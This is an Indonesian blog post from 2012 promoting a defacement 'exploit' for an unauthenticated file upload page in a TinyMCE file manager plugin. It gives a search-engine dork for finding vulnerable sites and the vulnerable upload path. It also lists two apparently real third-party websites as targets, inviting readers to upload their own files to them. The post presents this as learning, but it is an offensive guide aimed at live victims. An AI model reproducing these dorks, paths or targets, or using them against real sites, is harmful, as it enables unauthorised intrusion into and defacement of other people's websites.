Warung Bebas

Saturday, February 25, 2012

Vuln Plugins TinyMCE Insert File


saya ingin memberi beberapa Exploit yang menarik untuk di jadikan pembelajaran Deface.
Langsung saja kita bahas bersama.
Dork:
- inurl:filemanager/insertFile/
*Use Your Head for many target :D
_____________________________________________
/ \
| author: BadBoy |
| E-mail: fikri-badboy@asia-mail.com |
| copyright: 2010-2011 |
| Page:http://www.facebook.com/fikri.badboy |
\_____________________________________________/
| | |
|_ | _|
| | |
|__|__|
/-’P'-\
(__/ \__)
POC / Exploit :
http://[localhost]/Patch/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Setelah itu, maka akan tampil gambar berikut.
TinyMCE
Saya memberi beberapa target ny :D hehe
- http://www.verslogalimybes.lt/javascript/libs/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
- http://www.financialmilestones.com.au/wse/tinymce/jscripts/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Upload file kalian, lalu liat deh hasilnya :D
Preview ny bisa dilihat kalo sukses upload ny.
Okay segitu aja dulu ya :D
Good Luck ^^

0 comments em “Vuln Plugins TinyMCE Insert File”

Post a Comment

 

Indahnya Berbagi Copyright © 2012 Fast Loading -- Powered by Blogger